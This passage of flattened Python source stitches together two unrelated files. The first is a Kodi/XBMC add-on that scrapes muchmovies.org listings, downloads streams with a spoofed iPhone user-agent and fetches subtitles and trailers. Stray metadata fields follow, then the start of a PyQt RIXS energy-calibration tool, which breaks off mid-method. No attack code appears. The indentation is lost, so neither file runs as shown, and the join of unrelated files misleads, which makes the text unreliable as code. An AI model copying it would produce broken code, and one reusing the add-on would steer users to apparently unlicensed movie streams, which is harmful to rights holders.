subtitle response = urllib.urlopen(url) content = response.read() response.close() if content[:4] == 'PK': break file = open(sub_file, 'wb') file.write(content) file.close() file = zipfile.ZipFile(sub_file, 'r') file.extractall(sub_tmp) file.close() files = os.listdir(sub_tmp2) if files == []: raise Exception() file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')] if file == []: pack = [i for i in files if i.endswith('.zip') or i.endswith('.rar')] pack = os.path.join(sub_tmp2, pack[0]) xbmc.executebuiltin('Extract("%s","%s")' % (pack, sub_tmp2)) time.sleep(1) files = os.listdir(sub_tmp2) file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')][0] copy = os.path.join(sub_tmp2, file) shutil.copy(copy, sub_stream) try: shutil.rmtree(sub_tmp) except: pass file = os.path.join(sub_stream, file) if not os.path.isfile(file): raise Exception() xbmc.Player().setSubtitles(file) except: try: shutil.rmtree(sub_tmp) except: pass try: shutil.rmtree(sub_stream) except: pass index().infoDialog(language(30317).encode("utf-8"), name) return class index: def infoDialog(self, str, header=addonName): try: xbmcgui.Dialog().notification(header, str, addonIcon, 3000, sound=False) except: xbmc.executebuiltin("Notification(%s,%s, 3000, %s)" % (header, str, addonIcon)) def okDialog(self, str1, str2, header=addonName): xbmcgui.Dialog().ok(header, str1, str2) def selectDialog(self, list, header=addonName): select = xbmcgui.Dialog().select(header, list) return select def yesnoDialog(self, str1, str2, header=addonName): answer = xbmcgui.Dialog().yesno(header, str1, str2) return answer def getProperty(self, str): property = xbmcgui.Window(10000).getProperty(str) return property def setProperty(self, str1, str2): xbmcgui.Window(10000).setProperty(str1, str2) def clearProperty(self, str): xbmcgui.Window(10000).clearProperty(str) def addon_status(self, id): check = xbmcaddon.Addon(id=id).getAddonInfo("name") if not check == addonName: return True def container_refresh(self): xbmc.executebuiltin("Container.Refresh") def container_data(self): if not xbmcvfs.exists(dataPath): xbmcvfs.mkdir(dataPath) if not xbmcvfs.exists(favData): file = xbmcvfs.File(favData, 'w') file.write('') file.close() if not xbmcvfs.exists(viewData): file = xbmcvfs.File(viewData, 'w') file.write('') file.close() def container_view(self, content, viewDict): try: skin = xbmc.getSkinDir() file = xbmcvfs.File(viewData) read = file.read().replace('\n','') file.close() view = re.compile('"%s"[|]"%s"[|]"(.+?)"' % (skin, content)).findall(read)[0] xbmc.executebuiltin('Container.SetViewMode(%s)' % str(view)) except: try: id = str(viewDict[skin]) xbmc.executebuiltin('Container.SetViewMode(%s)' % id) except: pass def rootList(self, rootList): total = len(rootList) for i in rootList: try: name = language(i['name']).encode("utf-8") image = '%s/%s' % (addonArt, i['image']) action = i['action'] u = '%s?action=%s' % (sys.argv[0], action) item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image) item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } ) item.setProperty("Fanart_Image", addonFanart) item.addContextMenuItems([], replaceItems=False) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True) except: pass def pageList(self, pageList): if pageList == None: return total = len(pageList) for i in pageList: try: name, url, image = i['name'], i['url'], i['image'] sysname, sysurl, sysimage = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image) u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl) item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image) item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } ) item.setProperty("Fanart_Image", addonFanart) item.addContextMenuItems([], replaceItems=False) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True) except: pass def nextList(self, nextList): try: next = nextList[0]['next'] except: return if next == '': return name, url, image = language(30361).encode("utf-8"), next, addonNext sysurl = urllib.quote_plus(url) u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl) item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image) item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } ) item.setProperty("Fanart_Image", addonFanart) item.addContextMenuItems([], replaceItems=False) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True) def downloadList(self): u = getSetting("downloads") if u == '': return name, image = language(30363).encode("utf-8"), addonDownloads item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image) item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } ) item.setProperty("Fanart_Image", addonFanart) item.addContextMenuItems([], replaceItems=False) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True) def movieList(self, movieList): if movieList == None: return file = xbmcvfs.File(favData) favRead = file.read() file.close() total = len(movieList) for i in movieList: try: name, url, image, title, year, imdb, genre, plot = i['name'], i['url'], i['image'], i['title'], i['year'], i['imdb'], i['genre'], i['plot'] if plot == '': plot = addonDesc if genre == '': genre = ' ' sysname, sysurl, sysimage, systitle, sysimdb = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image), urllib.quote_plus(title), urllib.quote_plus(imdb) u = '%s?action=play&name=%s&url=%s&t=%s' % (sys.argv[0], sysname, sysurl, datetime.datetime.now().strftime("%Y%m%d%H%M%S%f")) if getSetting("meta") == 'true': meta = metaget.get_meta('movie', title ,year=year) playcountMenu = language(30407).encode("utf-8") if meta['overlay'] == 6: playcountMenu = language(30408).encode("utf-8") metaimdb = urllib.quote_plus(re.sub("[^0-9]", "", meta['imdb_id'])) trailer, poster = urllib.quote_plus(meta['trailer_url']), meta['cover_url'] if trailer == '': trailer = sysurl if poster == '': poster = image else: meta = {'label': title, 'title': title, 'year': year, 'imdb_id' : imdb, 'genre' : genre, 'plot': plot} trailer, poster = sysurl, image if getSetting("meta") == 'true' and getSetting("fanart") == 'true': fanart = meta['backdrop_url'] if fanart == '': fanart = addonFanart else: fanart = addonFanart cm = [] cm.append((language(30405).encode("utf-8"), 'RunPlugin(%s?action=item_queue)' % (sys.argv[0]))) cm.append((language(30406).encode("utf-8"), 'RunPlugin(%s?action=download&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) cm.append((language(30412).encode("utf-8"), 'Action(Info)')) if action == 'movies_favourites': if not getSetting("fav_sort") == '2': cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer))) if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb))) if getSetting("meta") == 'true': cm.append((playcountMenu, 'RunPlugin(%s?action=playcount_movies&imdb=%s)' % (sys.argv[0], metaimdb))) cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0]))) if getSetting("fav_sort") == '2': cm.append((language(30419).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveUp&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) if getSetting("fav_sort") == '2': cm.append((language(30420).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveDown&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) cm.append((language(30421).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) elif action == 'movies_search': cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer))) cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_from_search&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage))) cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0]))) cm.append((language(30409).encode("utf-8"), 'RunPlugin(%s?action=settings_open)' % (sys.argv[0]))) cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0]))) cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0]))) else: cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer))) if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies2&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb))) cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) if not '"%s"' % url in favRead: cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_add&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage))) else: cm.append((language(30418).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl))) cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0]))) cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0]))) cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0]))) item = xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=poster) item.setInfo( type="Video", infoLabels = meta ) item.setProperty("IsPlayable", "true") item.setProperty("Video", "true") item.setProperty("art(poster)", poster) item.setProperty("Fanart_Image", fanart) item.addContextMenuItems(cm, replaceItems=True) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=False) except: pass class contextMenu: def item_play(self): playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO) playlist.clear() xbmc.executebuiltin('Action(Queue)') playlist.unshuffle() xbmc.Player().play(playlist) def item_random_play(self): playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO) playlist.clear() xbmc.executebuiltin('Action(Queue)') playlist.shuffle() xbmc.Player().play(playlist) def item_queue(self): xbmc.executebuiltin('Action(Queue)') def playlist_open(self): xbmc.executebuiltin('ActivateWindow(VideoPlaylist)') def settings_open(self): xbmc.executebuiltin('Addon.OpenSettings(%s)' % (addonId)) def addon_home(self): xbmc.executebuiltin('Container.Update(plugin://%s/,replace)' % (addonId)) def view(self, content): try: skin = xbmc.getSkinDir() if xbmcvfs.exists(xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))): xml = xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin)) elif xbmcvfs.exists(xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))): xml = xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin)) else: return file = xbmcvfs.File(xml) read = file.read().replace('\n','') file.close() src = os.path.dirname(xml) + '/' try: src += re.compile('defaultresolution="(.+?)"').findall(read)[0] + '/' except: src += re.compile('<res.+?folder="(.+?)"').findall(read)[0] + '/' src += 'MyVideoNav.xml' file = xbmcvfs.File(src) read = file.read().replace('\n','') file.close() views = re.compile('<views>(.+?)</views>').findall(read)[0] views = [int(x) for x in views.split(',')] for view in views: label = xbmc.getInfoLabel('Control.GetLabel(%s)' % (view)) if not (label == '' or label is None): break file = xbmcvfs.File(viewData) read = file.read() file.close() file = open(viewData, 'w') for line in re.compile('(".+?\n)').findall(read): if not line.startswith('"%s"|"%s"|"' % (skin, content)): file.write(line) file.write('"%s"|"%s"|"%s"\n' % (skin, content, str(view))) file.close() viewName = xbmc.getInfoLabel('Container.Viewmode') index().infoDialog('%s%s%s' % (language(30301).encode("utf-8"), viewName, language(30302).encode("utf-8"))) except: return def favourite_add(self, data, name, url, image, imdb): try: index().container_refresh() file = open(data, 'a+') file.write('"%s"|"%s"|"%s"\n' % (name, url, image)) file.close() index().infoDialog(language(30303).encode("utf-8"), name) except: return def favourite_from_search(self, data, name, url, image, imdb): try: file = xbmcvfs.File(data) read = file.read() file.close() if url in read: index().infoDialog(language(30307).encode("utf-8"), name) return file = open(data, 'a+') file.write('"%s"|"%s"|"%s"\n' % (name, url, image)) file.close() index().infoDialog(language(30303).encode("utf-8"), name) except: return def favourite_delete(self, data, name, url): try: index().container_refresh() file = xbmcvfs.File(data) read = file.read() file.close() line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0] list = re.compile('(".+?\n)').findall(read.replace(line, '')) file = open(data, 'w') for line in list: file.write(line) file.close() index().infoDialog(language(30304).encode("utf-8"), name) except: return def favourite_moveUp(self, data, name, url): try: index().container_refresh() file = xbmcvfs.File(data) read = file.read() file.close() list = re.compile('(".+?)\n').findall(read) line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0] i = list.index(line) if i == 0 : return list[i], list[i-1] = list[i-1], list[i] file = open(data, 'w') for line in list: file.write('%s\n' % (line)) file.close() index().infoDialog(language(30305).encode("utf-8"), name) except: return def favourite_moveDown(self, data, name, url): try: index().container_refresh() file = xbmcvfs.File(data) read = file.read() file.close() list = re.compile('(".+?)\n').findall(read) line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0] i = list.index(line) if i+1 == len(list): return list[i], list[i+1] = list[i+1], list[i] file = open(data, 'w') for line in list: file.write('%s\n' % (line)) file.close() index().infoDialog(language(30306).encode("utf-8"), name) except: return def metadata(self, content, name, url, imdb, season, episode): try: if content == 'movie' or content == 'tvshow': metaget.update_meta(content, '', imdb, year='') index().container_refresh() elif content == 'season': metaget.update_episode_meta('', imdb, season, episode) index().container_refresh() elif content == 'episode': metaget.update_season('', imdb, season) index().container_refresh() except: return def playcount(self, content, imdb, season, episode): try: metaget.change_watched(content, '', imdb, season=season, episode=episode, year='', watched='') index().container_refresh() except: return def library(self, name, url, silent=False): try: library = xbmc.translatePath(getSetting("movie_library")) sysname, sysurl = urllib.quote_plus(name), urllib.quote_plus(url) content = '%s?action=play&name=%s&url=%s' % (sys.argv[0], sysname, sysurl) enc_name = name.translate(None, '\/:*?"<>|') folder = os.path.join(library, enc_name) stream = os.path.join(folder, enc_name + '.strm') xbmcvfs.mkdir(dataPath) xbmcvfs.mkdir(library) xbmcvfs.mkdir(folder) file = xbmcvfs.File(stream, 'w') file.write(content) file.close() if silent == False: index().infoDialog(language(30311).encode("utf-8"), name) except: return def download(self, name, url): try: property = (addonName+name)+'download' download = xbmc.translatePath(getSetting("downloads")) enc_name = name.translate(None, '\/:*?"<>|') xbmcvfs.mkdir(dataPath) xbmcvfs.mkdir(download) file = [i for i in xbmcvfs.listdir(download)[1] if i.startswith(enc_name + '.')] if not file == []: file = os.path.join(download, file[0]) else: file = None if download == '': yes = index().yesnoDialog(language(30341).encode("utf-8"), language(30342).encode("utf-8")) if yes: contextMenu().settings_open() return if file is None: pass elif not file.endswith('.tmp'): yes = index().yesnoDialog(language(30343).encode("utf-8"), language(30344).encode("utf-8"), name) if yes: xbmcvfs.delete(file) else: return elif file.endswith('.tmp'): if index().getProperty(property) == 'open': yes = index().yesnoDialog(language(30345).encode("utf-8"), language(30346).encode("utf-8"), name) if yes: index().setProperty(property, 'cancel') return else: xbmcvfs.delete(file) url = resolver().run(url, name, download=True) if url is None: return ext = url.rsplit('/', 1)[-1].rsplit('?', 1)[0].rsplit('|', 1)[0].strip().lower() ext = os.path.splitext(ext)[1][1:] stream = os.path.join(download, enc_name + '.' + ext) temp = stream + '.tmp' count = 0 CHUNK = 16 * 1024 request = urllib2.Request(url) request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7') request.add_header('Cookie', 'video=true') #add cookie response = urllib2.urlopen(request, timeout=10) size = response.info()["Content-Length"] file = xbmcvfs.File(temp, 'w') index().setProperty(property, 'open') index().infoDialog(language(30308).encode("utf-8"), name) while True: chunk = response.read(CHUNK) if not chunk: break if index().getProperty(property) == 'cancel': raise Exception() if xbmc.abortRequested == True: raise Exception() part = xbmcvfs.File(temp) quota = int(100 * float(part.size())/float(size)) part.close() if not count == quota and count in [0,10,20,30,40,50,60,70,80,90]: index().infoDialog(language(30309).encode("utf-8") + str(count) + '%', name) file.write(chunk) count = quota response.close() file.close() index().clearProperty(property) xbmcvfs.rename(temp, stream) index().infoDialog(language(30310).encode("utf-8"), name) except: file.close() index().clearProperty(property) xbmcvfs.delete(temp) sys.exit() return def trailer(self, name, url): url = resolver().trailer(name, url) if url is None: return item = xbmcgui.ListItem(path=url) item.setProperty("IsPlayable", "true") xbmc.Player(xbmc.PLAYER_CORE_AUTO).play(url, item) class favourites: def __init__(self): self.list = [] def movies(self): file = xbmcvfs.File(favData) read = file.read() file.close() match = re.compile('"(.+?)"[|]"(.+?)"[|]"(.+?)"').findall(read) for name, url, image in match: try: year = re.compile('[(](\d{4})[)]').findall(name)[-1] except: year = '0' title = name.replace('(%s)' % year, '').strip() self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': ''}) if getSetting("fav_sort") == '0': self.list = sorted(self.list, key=itemgetter('title')) elif getSetting("fav_sort") == '1': self.list = sorted(self.list, key=itemgetter('title'))[::-1] self.list = sorted(self.list, key=itemgetter('year'))[::-1] index().movieList(self.list) class root: def get(self): rootList = [] rootList.append({'name': 30501, 'image': 'Title.png', 'action': 'movies_title'}) rootList.append({'name': 30502, 'image': 'Release.png', 'action': 'movies_release'}) rootList.append({'name': 30503, 'image': 'Added.png', 'action': 'movies_added'}) rootList.append({'name': 30504, 'image': 'Rating.png', 'action': 'movies_rating'}) rootList.append({'name': 30505, 'image': 'Pages.png', 'action': 'pages_movies'}) rootList.append({'name': 30506, 'image': 'Genres.png', 'action': 'genres_movies'}) rootList.append({'name': 30507, 'image': 'Favourites.png', 'action': 'movies_favourites'}) rootList.append({'name': 30508, 'image': 'Search.png', 'action': 'movies_search'}) index().rootList(rootList) index().downloadList() class link: def __init__(self): self.muchmovies_base = 'http://www.muchmovies.org' self.muchmovies_sort = 'http://www.muchmovies.org/session/sort' self.muchmovies_title = 'http://www.muchmovies.org/movies?sort_by=title' self.muchmovies_release = 'http://www.muchmovies.org/movies?sort_by=release' self.muchmovies_added = 'http://www.muchmovies.org/movies?sort_by=date_added' self.muchmovies_rating = 'http://www.muchmovies.org/movies?sort_by=rating' self.muchmovies_root = 'http://www.muchmovies.org/movies' self.muchmovies_search = 'http://www.muchmovies.org/search' self.muchmovies_genre = 'http://www.muchmovies.org/genres' self.youtube_base = 'http://www.youtube.com' self.youtube_search = 'http://gdata.youtube.com/feeds/api/videos?q=' self.youtube_watch = 'http://www.youtube.com/watch?v=%s' self.youtube_info = 'http://gdata.youtube.com/feeds/api/videos/%s?v=2' class pages: def __init__(self): self.list = [] def muchmovies(self): self.list = self.muchmovies_list() index().pageList(self.list) def muchmovies_list(self): try: result = getUrl(link().muchmovies_root, mobile=True).result pages = common.parseDOM(result, "div", attrs = { "class": "pagenav" })[0] pages = re.compile('(<option.+?</option>)').findall(pages) except: return for page in pages: try: name = common.parseDOM(page, "option")[0] name = common.replaceHTMLCodes(name) name = name.encode('utf-8') url = common.parseDOM(page, "option", ret="value")[0] url = '%s%s?sort_by=title' % (link().muchmovies_base, url) url = common.replaceHTMLCodes(url) url = url.encode('utf-8') image = addonPages.encode('utf-8') self.list.append({'name': name, 'url': url, 'image': image}) except: pass return self.list class genres: def __init__(self): self.list = [] def muchmovies(self): self.list = self.muchmovies_list() index().pageList(self.list) def muchmovies_list(self): try: result = getUrl(link().muchmovies_genre, mobile=True).result genres = common.parseDOM(result, "ul", attrs = { "id": "genres" }) genres = common.parseDOM(genres, "li") except: return for genre in genres: try: name = common.parseDOM(genre, "h2")[0] name = common.replaceHTMLCodes(name) name = name.encode('utf-8') url = common.parseDOM(genre, "a", ret="href")[0] url = '%s%s?sort_by=release' % (link().muchmovies_base, url) url = common.replaceHTMLCodes(url) url = url.encode('utf-8') image = common.parseDOM(genre, "img", ret="src")[0] image = '%s%s' % (link().muchmovies_base, image) image = common.replaceHTMLCodes(image) image = image.encode('utf-8') self.list.append({'name': name, 'url': url, 'image': image}) except: pass return self.list class movies: def __init__(self): self.list = [] self.data = [] def muchmovies(self, url): self.list = self.muchmovies_list(url) index().movieList(self.list) index().nextList(self.list) def muchmovies_title(self): self.list = self.muchmovies_list(link().muchmovies_title) index().movieList(self.list) index().nextList(self.list) def muchmovies_release(self): self.list = self.muchmovies_list(link().muchmovies_release) index().movieList(self.list) index().nextList(self.list) def muchmovies_added(self): self.list = self.muchmovies_list(link().muchmovies_added) index().movieList(self.list) index().nextList(self.list) def muchmovies_rating(self): self.list = self.muchmovies_list(link().muchmovies_rating) index().movieList(self.list) index().nextList(self.list) def muchmovies_search(self, query=None): if query is None: self.query = common.getUserInput(language(30362).encode("utf-8"), '') else: self.query = query if not (self.query is None or self.query == ''): self.query = link().muchmovies_search + '/' + urllib.quote_plus(self.query.replace(' ', '-')) self.list = self.muchmovies_list(self.query) index().movieList(self.list) index().nextList(self.list) def muchmovies_list(self, url): try: post = url.split('?')[-1] result = getUrl(link().muchmovies_sort, post=post, mobile=True, close=False, cookie=True).result result = getUrl(url, mobile=True).result movies = common.parseDOM(result, "li", attrs = { "data-icon": "false" }) except: return try: try: next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r", "class": "ui-disabled" })[0] next = '' except: next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r" })[0] next = '%s%s?%s' % (link().muchmovies_base, next, post) except: next = '' for movie in movies: try: name = common.parseDOM(movie, "h2")[0] name = common.replaceHTMLCodes(name) name = name.encode('utf-8') match = re.findall('(.+?)[(](\d{4})[)]', name)[0] title = match[0].strip() title = common.replaceHTMLCodes(title) title = title.encode('utf-8') year = match[-1].strip() year = re.sub("[^0-9]", "", year) year = year.encode('utf-8') url = common.parseDOM(movie, "a", ret="href")[0] url = '%s%s' % (link().muchmovies_base, url) url = common.replaceHTMLCodes(url) url = url.encode('utf-8') image = common.parseDOM(movie, "img", ret="src")[0] image = common.replaceHTMLCodes(image) image = image.encode('utf-8') self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': '', 'next': next}) except: pass return self.list class resolver: def run(self, url, name=None, download=False): try: if player().status() is True: return url = self.muchmovies(url) if url is None: raise Exception() if download == True: return url player().run(name, url) return url except: index().infoDialog(language(30318).encode("utf-8")) return def muchmovies(self, url): try: result = getUrl(url, mobile=True).result url = common.parseDOM(result, "a", ret="href") url = [i for i in url if "?action=stream" in i][0] url = url.split("?")[0] return url except: return def trailer(self, name, url): try: if not url.startswith('http://'): url = link().youtube_watch % url url = self.youtube(url) else: try: result = getUrl(url).result url = re.compile('"http://www.youtube.com/embed/(.+?)"').findall(result)[0] if ' ' in url: raise Exception() url = url.split("?")[0].split("&")[0] url = link().youtube_watch % url url = self.youtube(url) except: url = link().youtube_search + name + ' trailer' url = self.youtube_search(url) if url is None: return return url except: return def youtube_search(self, url): try: if index().addon_status('plugin.video.youtube') is None: index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8")) return query = url.split("?q=")[-1].split("/")[-1].split("?")[0] url = url.replace(query, urllib.quote_plus(query)) result = getUrl(url).result result = common.parseDOM(result, "entry") result = common.parseDOM(result, "id") for url in result[:5]: url = url.split("/")[-1] url = link().youtube_watch % url url = self.youtube(url) if not url is None: return url except: return def youtube(self, url): try: if index().addon_status('plugin.video.youtube') is None: index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8")) return id = url.split("?v=")[-1].split("/")[-1].split("?")[0].split("&")[0] state, reason = None, None result = getUrl(link().youtube_info % id).result try: state = common.parseDOM(result, "yt:state", ret="name")[0] reason = common.parseDOM(result, "yt:state", ret="reasonCode")[0] except: pass if state == 'deleted' or state == 'rejected' or state == 'failed' or reason == 'requesterRegion' : return try: result = getUrl(link().youtube_watch % id).result alert = common.parseDOM(result, "div", attrs = { "id": "watch7-notification-area" })[0] return except: pass url = 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % id return url except: return main()
gpl-2.0
-4,796,895,218,968,150,000
45.186472
868
0.534018
false
3.821722
false
false
false
kkummer/RixsToolBox
RTB_EnergyCalibration.py
1
21352
#!/usr/bin/env python #-*- coding: utf-8 -*- #/*########################################################################## # Copyright (C) 2016 K. Kummer, A. Tamborino, European Synchrotron Radiation # Facility # # This file is part of the ID32 RIXSToolBox developed at the ESRF by the ID32 # staff and the ESRF Software group. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # #############################################################################*/ from __future__ import division __author__ = "K. Kummer - ESRF ID32" __contact__ = "kurt.kummer@esrf.fr" __license__ = "MIT" __copyright__ = "European Synchrotron Radiation Facility, Grenoble, France" ___doc__ = """ ... """ import os import copy import time import numpy as np from PyMca5.PyMcaGui import PyMcaQt as qt from PyMca5.PyMcaGui.pymca import ScanWindow from PyMca5.PyMcaCore.SpecFileDataSource import SpecFileDataSource from PyMca5.PyMcaGui.pymca import QDispatcher from PyMca5.PyMcaGui.pymca.SumRulesTool import MarkerSpinBox from RTB_SpecGen import ExportWidget from RTB_Icons import RtbIcons class MainWindow(qt.QWidget): def __init__(self, parent=None): DEBUG = 1 qt.QWidget.__init__(self, parent) self.setWindowTitle('RixsToolBox - Energy conversion') self.setWindowIcon(qt.QIcon(qt.QPixmap(RtbIcons['Logo']))) self.build() self.connect_signals() self.scansCalibrated = False def build(self): self._sourceWidget = QDispatcher.QDispatcher(self) fileTypeList = ['Spec Files (*.spec)', 'Dat Files (*.dat)', 'All Files (*.*)'] self._sourceWidget.sourceSelector.fileTypeList = fileTypeList for tabnum in range(self._sourceWidget.tabWidget.count()): if self._sourceWidget.tabWidget.tabText(tabnum) != 'SpecFile': self._sourceWidget.tabWidget.removeTab(tabnum) self._sourceWidget.selectorWidget['SpecFile'] self._exportWidget = ExportWidget() self._plotSpectraWindow = ScanWindow.ScanWindow( parent=self, backend=None, plugins=False, # Hide plugin tool button roi=False, # No ROI widget control=True, # Hide option button position=True, # Show x,y position display info=True, ) #~ self._plotSpectraWindow.graph.enablemarkermode() calibrationWidget = qt.QGroupBox() calibrationWidget.setTitle('Parameters') calibrationLayout = qt.QHBoxLayout() self._ecalibSpinBox = qt.QDoubleSpinBox() self._ecalibSpinBox.setMaximumWidth(100) self._ecalibSpinBox.setMinimumWidth(70) self._ecalibSpinBox.setAlignment(qt.Qt.AlignRight) self._ecalibSpinBox.setMinimum(-1000000) self._ecalibSpinBox.setMaximum(1000000) self._ecalibSpinBox.setDecimals(2) self._ecalibSpinBox.setSingleStep(1) self._ecalibSpinBox.setValue(50) ecalibLayout = qt.QHBoxLayout() ecalibLayout.addWidget(qt.QLabel('meV / px')) ecalibLayout.addWidget(qt.HorizontalSpacer()) ecalibLayout.addWidget(self._ecalibSpinBox) ecalibWidget = qt.QWidget() ecalibWidget.setLayout(ecalibLayout) self._ezeroSpinBox = MarkerSpinBox(self, self._plotSpectraWindow, r'$E=0$') self._ezeroSpinBox.setMaximumWidth(100) self._ezeroSpinBox.setMinimumWidth(70) self._ezeroSpinBox.setAlignment(qt.Qt.AlignRight) self._ezeroSpinBox.setMinimum(-100000) self._ezeroSpinBox.setMaximum(100000) self._ezeroSpinBox.setDecimals(3) self._ezeroSpinBox.setSingleStep(1) self._ezeroSpinBox.setValue(0) ezeroLayout = qt.QHBoxLayout() ezeroLayout.addWidget(qt.QLabel('zero energy pixel')) ezeroLayout.addWidget(qt.HorizontalSpacer()) ezeroLayout.addWidget(self._ezeroSpinBox) ezeroWidget = qt.QWidget() ezeroWidget.setLayout(ezeroLayout) self._markersPositioned = False calibrationLayout.addWidget(ecalibWidget) calibrationLayout.addWidget(ezeroWidget) calibrationWidget.setLayout(calibrationLayout) self.showGaussianCheckBox = qt.QCheckBox('Show Gaussian at zero energy') self.GaussianWidthSpinBox = qt.QDoubleSpinBox() self.GaussianWidthSpinBox.setMaximumWidth(100) self.GaussianWidthSpinBox.setMinimumWidth(70) self.GaussianWidthSpinBox.setAlignment(qt.Qt.AlignRight) self.GaussianWidthSpinBox.setMinimum(0.001) self.GaussianWidthSpinBox.setMaximum(10000000) self.GaussianWidthSpinBox.setDecimals(3) self.GaussianWidthSpinBox.setSingleStep(1) self.GaussianWidthSpinBox.setValue(1) self.GaussianWidthSpinBox.setEnabled(False) GaussianWidthLayout = qt.QHBoxLayout() GaussianWidthLayout.addWidget(qt.QLabel('FWHM')) GaussianWidthLayout.addSpacing(10) 